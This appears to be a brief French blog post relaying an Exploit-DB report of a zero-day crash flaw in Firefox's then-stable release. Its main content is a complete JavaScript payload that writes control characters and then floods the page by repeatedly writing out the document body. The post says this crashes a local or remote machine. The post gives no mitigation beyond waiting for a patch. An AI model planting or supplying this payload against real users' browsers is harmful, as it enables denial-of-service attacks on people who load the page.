Merci à Exploit-DB qui nous informe d’une nouvelle faille Zero Day concernant la dernière version stable de Mozilla Firefox.
Un petit script permet de planter une machine locale ou distante :
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a");} for (i=0;i<=3;i++) { document.write(document.body.innerHTML);} </script>
Il n’y a plus qu’à attendre le correctif de sécurité…